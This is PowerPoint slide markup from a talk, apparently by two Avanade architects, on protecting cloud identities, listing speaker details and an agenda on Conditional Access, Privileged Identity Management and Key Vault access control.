              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F17ED47-3DC5-45DD-91DB-7F24BB8A8E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7625680" y="6488668"/>
            <a:ext cx="3688767" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Slide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Deck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>: github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>msugn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>events</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4253124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F1693713-D199-41BB-87D8-F6EE5BA828AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6700329" y="4213024"/>
            <a:ext cx="4851906" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Craig Forshaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Technical Architect | Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO"/>
              <a:t> @ Avanade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5EC0677-A7E3-4972-F453-226DE3EE3FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497205" y="447691"/>
            <a:ext cx="10772775" cy="505158"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Who are we ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{100BFA5D-0332-4BF1-AF52-4199F1362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9226" y="5395555"/>
            <a:ext cx="336804" cy="336804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B010374-2DF6-427B-BEAE-A5491B1D71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9226" y="4930753"/>
            <a:ext cx="336804" cy="336804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{332982DE-B6BE-4112-9BFF-ABD70AE6410A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1626469" y="4914489"/>
            <a:ext cx="1044132" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" i="1">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>@haflidif</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{352D9C0E-1ACE-4174-A91F-76EA75C7F9BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1626469" y="5363027"/>
            <a:ext cx="2437399" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" i="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Linkedin.com/In/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" i="1" err="1">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>haflidif</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1587ED5B-4A43-4B3B-8F7D-14B2CD230431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183595" y="4200689"/>
            <a:ext cx="5326651" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO"/>
              <a:t>Haflidi Fridthjofsson </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO"/>
              <a:t>Technical Architect | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" err="1"/>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" err="1"/>
              <a:t>Infra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO"/>
              <a:t> Security @ Avanade</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3861DA-AE8C-4576-8B37-3E2165DFB4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9226" y="5844093"/>
            <a:ext cx="336804" cy="336804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11068AA8-E6D8-4C1E-AC13-DF6D250261DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636030" y="5813199"/>
            <a:ext cx="1313308" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" i="1">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Techegg.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="A picture containing text, sign, vector graphics&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9063498-04E8-4D50-8EFA-04B2B1ED2B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77329" y="4213024"/>
            <a:ext cx="337460" cy="337460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3583D99C-3E8B-4701-B91F-FFA8E6BBDED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8171091" y="4242381"/>
            <a:ext cx="287556" cy="283079"/>
            <a:chOff x="3040856" y="4465135"/>
            <a:chExt cx="287556" cy="283079"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Picture 24" descr="Logo, company name&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43AE5F06-57E2-4628-BD59-FD8667C6895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40856" y="4465135"/>
              <a:ext cx="287556" cy="283078"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Oval 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD0C2AA-EE8D-417E-A483-3FE83430A9BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3040856" y="4465135"/>
              <a:ext cx="287556" cy="283079"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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Picture 28" descr="Icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41A0861B-265D-4247-AFB1-2F481E735D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96347" y="5389572"/>
            <a:ext cx="336804" cy="336804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2583FD2D-7120-4194-910D-8A68ED7D1C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6347" y="4924770"/>
            <a:ext cx="336804" cy="336804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6561917F-F581-4AEB-BAC5-7AC69970F9D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7123590" y="4908506"/>
            <a:ext cx="1445011" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" i="1">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>@craig_forsh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F373762-B806-462E-9BE0-2590352198F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7123590" y="5357044"/>
            <a:ext cx="2830134" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" i="1">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Linkedin.com/In/craig4shaw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D80F1C6D-9FEF-43B6-A4C8-CA62C1D1C315}"/>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13636" b="13636"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516405" y="1320275"/>
            <a:ext cx="2659380" cy="2721365"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="F8A553"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 34" descr="A person wearing sunglasses&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F2537E8-B9F5-4B17-9710-C45243FFF53E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="29342" t="5999" r="1524" b="3381"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1160734" y="1343136"/>
            <a:ext cx="2705101" cy="2659380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1 w 2705101"/>
              <a:gd name="connsiteY0" fmla="*/ 1329690 h 2659380"/>
              <a:gd name="connsiteX1" fmla="*/ 1352551 w 2705101"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2659380"/>
              <a:gd name="connsiteX2" fmla="*/ 2705101 w 2705101"/>
              <a:gd name="connsiteY2" fmla="*/ 1329690 h 2659380"/>
              <a:gd name="connsiteX3" fmla="*/ 1352551 w 2705101"/>
              <a:gd name="connsiteY3" fmla="*/ 2659380 h 2659380"/>
              <a:gd name="connsiteX4" fmla="*/ 1 w 2705101"/>
              <a:gd name="connsiteY4" fmla="*/ 1329690 h 265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5101" h="2659380">
                <a:moveTo>
                  <a:pt x="1" y="1329690"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="595322"/>
                  <a:pt x="605558" y="0"/>
                  <a:pt x="1352551" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2099544" y="0"/>
                  <a:pt x="2705101" y="595322"/>
                  <a:pt x="2705101" y="1329690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2705101" y="2064058"/>
                  <a:pt x="2099544" y="2659380"/>
                  <a:pt x="1352551" y="2659380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="605557" y="2659380"/>
                  <a:pt x="0" y="2064058"/>
                  <a:pt x="1" y="1329690"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F8A553"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1413710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16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1CCD5EF-766D-43B9-A25D-19122E5FB1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7"/>
            <a:ext cx="10905065" cy="1989682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln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18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9699C9-77F1-4E33-A750-CB78C7EA2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95" y="806204"/>
            <a:ext cx="10579608" cy="1664208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln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B763D8-F719-412F-9F7E-AD35C29BF47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071846" y="1059736"/>
            <a:ext cx="10040233" cy="1228130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E9A864-ECD3-43C0-A36D-8DF93C69B0D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071846" y="2973313"/>
            <a:ext cx="10040233" cy="2903099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Protecting your Identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Conditional Access: Basics and four rules you should absolutely have.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Privileged Identity Management: Implement PIM without the confusion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Role Based Access Control (RBAC): Lessons learned with RBAC vs Access Policies on Key Vault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Questions ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="602099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38015-2637-415E-BB8C-2D3D944E752A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:cs typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>Protecting your Identity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA72D0C-65D5-423A-A68F-8A4F4D61DF7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59204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6AF0FA6-9520-4133-B812-088BADCEC876}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5938604" y="2646536"/>
            <a:ext cx="4187813" cy="1101482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FD159AB-C22C-4CB1-AA26-61D65C38C3F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="970825" y="2738153"/>
            <a:ext cx="4676117" cy="1288693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6487F8E5-52D3-430D-8AB3-846C73EB0DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179329" y="4060374"/>
            <a:ext cx="4525725" cy="1174786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0C3FF4-734C-42E0-A3D5-B8BDB9967465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="499533"/>
